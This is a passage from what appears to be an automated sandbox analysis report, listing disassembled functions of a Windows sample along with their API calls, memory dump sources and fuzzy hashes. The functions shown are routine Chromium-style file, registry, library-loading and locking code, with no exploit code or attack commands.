                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID: ..\..\base\files\file_util_win.cc$PathExists$msedge.exe
                                                  • API String ID: 3188754299-3206840752
                                                  • Opcode ID: 8588430456a835efdc768bd834f82715fd0475a85eb33309d921d7a86035c37c
                                                  • Instruction ID: 540fa9ff9f8672b67bba2029842d6ecb6f7d64e0273ffd71c73d148c4d21f407
                                                  • Opcode Fuzzy Hash: 8588430456a835efdc768bd834f82715fd0475a85eb33309d921d7a86035c37c
                                                  • Instruction Fuzzy Hash: D11126719183C1ABD3219B24DC42A6EB7A4FFD6774F100B1DF8E1531C1EBA09584C6A2
                                                  Function 00D28B60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileSizeEx.KERNEL32(?,FFFFFFFF), ref: 00D28C09
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: FileSize
                                                  • String ID: ..\..\base\files\file_win.cc$File::GetLength$GetLength
                                                  • API String ID: 3433856609-1526572189
                                                  • Opcode ID: 147c8171f4946ab75fbb44f950c8a4edba308b8ab637991969511e8bc6fe84c1
                                                  • Instruction ID: a8687c326b3c1e870bb0c284465bb1b992f3394ba46ed85fe93bc5b3f98dee6d
                                                  • Opcode Fuzzy Hash: 147c8171f4946ab75fbb44f950c8a4edba308b8ab637991969511e8bc6fe84c1
                                                  • Instruction Fuzzy Hash: 75218072514391ABD210DF68C802A6EF7A4FFD9734F104B1CF5E5671D1DBB095098BA2
                                                  Function 00D262F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00D25744,?,?,?,00D25744), ref: 00D26345
                                                  • RegCloseKey.ADVAPI32(?), ref: 00D2635C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen
                                                  • String ID: ..\..\base\win\registry.cc$Open
                                                  • API String ID: 47109696-830328924
                                                  • Opcode ID: bb8619353ade47ac6c0af2f5c3651d13cfe8fab93e1fa92fe6e4a4bae7b2df31
                                                  • Instruction ID: e9c3c14f9b882ac6450c8dd5112dfc159daccf80b94f249fabcb235a5bd37b19
                                                  • Opcode Fuzzy Hash: bb8619353ade47ac6c0af2f5c3651d13cfe8fab93e1fa92fe6e4a4bae7b2df31
                                                  • Instruction Fuzzy Hash: AE118F35A00309ABCB00DF99DC55EEFBBB8EF59364F094419F915A7281DB30A904CBB4
                                                  Function 00D88EBC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D88F58,00000000,?,?,?,?,?,00D88E16,00000002,FlsGetValue,00DA2748,00DA2750), ref: 00D88EC9
                                                  • GetLastError.KERNEL32(?,00D88F58,00000000,?,?,?,?,?,00D88E16,00000002,FlsGetValue,00DA2748,00DA2750,00000000,?,00D7929A), ref: 00D88ED3
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D88EFB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: api-ms-
                                                  • API String ID: 3177248105-2084034818
                                                  • Opcode ID: d63272db481527912e1a7586f3e09374d7b211e5cf7420eeaf09118853b7082f
                                                  • Instruction ID: 0772e5521e4021cb84c5466a127bac0587743fa44dbf375e7b91f291a10ff37d
                                                  • Opcode Fuzzy Hash: d63272db481527912e1a7586f3e09374d7b211e5cf7420eeaf09118853b7082f
                                                  • Instruction Fuzzy Hash: D7E04830344745FBDF102B51EC06B593E59DF00B50F944021FB0CE41E1EBE5D9109674
                                                  Function 00D03840 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D03848
                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D03854
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                  • API String ID: 1646373207-706389432
                                                  • Opcode ID: aefb318f478bbbe844e04396b4171a9f5fe997d73b0c766b29e418c3210fbaba
                                                  • Instruction ID: e7dedcfa15327f49cd14a8d7ce5f728f4e52272ff97a286832bf484ade4e281b
                                                  • Opcode Fuzzy Hash: aefb318f478bbbe844e04396b4171a9f5fe997d73b0c766b29e418c3210fbaba
                                                  • Instruction Fuzzy Hash: 08D0C934644309DF86009BE6AC0AE463A6CA605A24790456AF60AC2371D7F1E4104A71
                                                  Function 00D477C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00D479A4), ref: 00D477C8
                                                  • GetProcAddress.KERNEL32(00000000,PrefetchVirtualMemory), ref: 00D477D4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: PrefetchVirtualMemory$kernel32.dll
                                                  • API String ID: 1646373207-4069913949
                                                  • Opcode ID: d1c8c989eda4b0baf32c4f320dd893d3e93032304e2b7f9e52e95aeacbcca84c
                                                  • Instruction ID: 635e2baeaf0cb88d200f0aa7e85fdf8d355a4c15017bd29f60797be4330baf41
                                                  • Opcode Fuzzy Hash: d1c8c989eda4b0baf32c4f320dd893d3e93032304e2b7f9e52e95aeacbcca84c
                                                  • Instruction Fuzzy Hash: 5CB09B71584308EF491057D17C0E8953A5CD504E317444502F107D11519FE590144571
                                                  Function 00D1F9E0 Relevance: 6.2, APIs: 4, Instructions: 226COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D1FA14
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D1FAA0
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D1FAB8
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D1FC1E
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID:
                                                  • API String ID: 1678258262-0
                                                  • Opcode ID: 66273a16db3505cbdf5ec600c9412f38ec9df9c72771dda104615601d19f7697
                                                  • Instruction ID: c8d2b340348838b0ce9542518c0650168b881cb428635e0baf3ea6195a38793c
                                                  • Opcode Fuzzy Hash: 66273a16db3505cbdf5ec600c9412f38ec9df9c72771dda104615601d19f7697
                                                  • Instruction Fuzzy Hash: C98194756043019BDB24DF24E4D0B6AB7E6BF84720F184A2DE99687391CB30EC49CBB1
                                                  Function 00D57E10 Relevance: 6.2, APIs: 4, Instructions: 213COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: bf20537032ccea578429d887db1e6eb455075e5e36b73ea4f0a3325825bbcbd9
                                                  • Instruction ID: 53a732b92c646ce151cd6106629c623bfd9a2498f38833bc93aa7ff7c31a162d
                                                  • Opcode Fuzzy Hash: bf20537032ccea578429d887db1e6eb455075e5e36b73ea4f0a3325825bbcbd9
                                                  • Instruction Fuzzy Hash: 376107B5A082568FDF10CE29E891A7B77E5EF41346B2C0469FC969B341EA30DC09D770
                                                  Function 00D7977F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AdjustPointer
                                                  • String ID:
                                                  • API String ID: 1740715915-0
                                                  • Opcode ID: e7e2af6fe7630081f8b9e3627b9d14f3c5fa2ddf6a55d06de2652f9186aa7e38
                                                  • Instruction ID: b919e319ccc649986c66badbc2334591bd41376ed19e334ad2fd5cb48662676f
                                                  • Opcode Fuzzy Hash: e7e2af6fe7630081f8b9e3627b9d14f3c5fa2ddf6a55d06de2652f9186aa7e38
                                                  • Instruction Fuzzy Hash: FB51C173601602AFEB288F54D861BBAB7A4FF55310F18812DE84957691F731ED41CBB1
                                                  Function 00D5F7E0 Relevance: 6.1, APIs: 4, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TlsGetValue.KERNEL32(FFFFFFFF), ref: 00D5F809
                                                    • Part of subcall function 00D61600: TlsSetValue.KERNEL32(FFFFFFFF,00D5F84B,?,00D5F84B,FFFFFFFF,?), ref: 00D61609
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D5F89E
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D5F8C9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLockValue$AcquireRelease
                                                  • String ID:
                                                  • API String ID: 541261624-0
                                                  • Opcode ID: 8711a1214b4b87a13b70f747f9134d1bbd14723ffd04dec1e6543843d2dcc9b6
                                                  • Instruction ID: f82baa9eec075d5f18ccd8f5de992a36dbc661d54a00b8ca8d166b22a554017c
                                                  • Opcode Fuzzy Hash: 8711a1214b4b87a13b70f747f9134d1bbd14723ffd04dec1e6543843d2dcc9b6
                                                  • Instruction Fuzzy Hash: DA5122B1A003089BDF20AF64EC45BA93364FF44306F184579EE499B292DB715E498FB1
                                                  Function 00D4F8C0 Relevance: 6.1, APIs: 4, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D4F920
                                                  • _strlen.LIBCMT ref: 00D4F9A8
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DAFCAE,?,?,00DAFCAE,?,?), ref: 00D4F9E7
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DAFCAE,?,?,?,?,?,00DAFCAE,?,?), ref: 00D4FA4F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Release$Acquire_strlen
                                                  • String ID:
                                                  • API String ID: 175025429-0
                                                  • Opcode ID: d8adec9e32f5b874fe04d1002f61df08032b7d7a4bcad293a98f55d668f778f9
                                                  • Instruction ID: 0e871d0c01d183e5df7c330c212ede77cbabcb8c264839f2d895a2bb6c7e52a1
                                                  • Opcode Fuzzy Hash: d8adec9e32f5b874fe04d1002f61df08032b7d7a4bcad293a98f55d668f778f9
                                                  • Instruction Fuzzy Hash: 6F414575E00314ABDB10AF94EC82FBE7765EF48715F084036F95567361D761AE088BB2
                                                  Function 00D5CF27 Relevance: 6.1, APIs: 4, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: __aulldiv__aullrem
                                                  • String ID:
                                                  • API String ID: 3839614884-0
                                                  • Opcode ID: dd52aefa5c438f3f5e84e27fc1db3c3ea0014895132e96dfd9de58907ec02b46
                                                  • Instruction ID: 818715b0295151c6adf6f5f4f0441556700199bc47d0eabb05e174d3f0dd2efa
                                                  • Opcode Fuzzy Hash: dd52aefa5c438f3f5e84e27fc1db3c3ea0014895132e96dfd9de58907ec02b46
                                                  • Instruction Fuzzy Hash: 623181717002095FDB24DE6DCC82D7A77AAEF85350B188539F945DB342EA319D098770
                                                  Function 00D59B40 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,?,00000000,00000000,?,?,00000000,00000004,00000000), ref: 00D59C20
                                                  • SetLastError.KERNEL32(00000000), ref: 00D59C2D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorInfoLastNamedSecurity
                                                  • String ID:
                                                  • API String ID: 2346220347-0
                                                  • Opcode ID: 2ea7acf786b11aff94a55c5f21e77e6a7919d2c028bd0fc031fe42927b339f17
                                                  • Instruction ID: 7fc3264b2f3f421042099763f723e7f04fa72cef86a057dbbdf1bd1ffaed489a
                                                  • Opcode Fuzzy Hash: 2ea7acf786b11aff94a55c5f21e77e6a7919d2c028bd0fc031fe42927b339f17
                                                  • Instruction Fuzzy Hash: E6310931E04210DFFF258A64E8947BBFBA5EB84311F1C4129EE8696290C779DC89D7B1
                                                  Function 00D267C0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(00000000), ref: 00D267EF
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D2682C
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D2684D
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D268AD
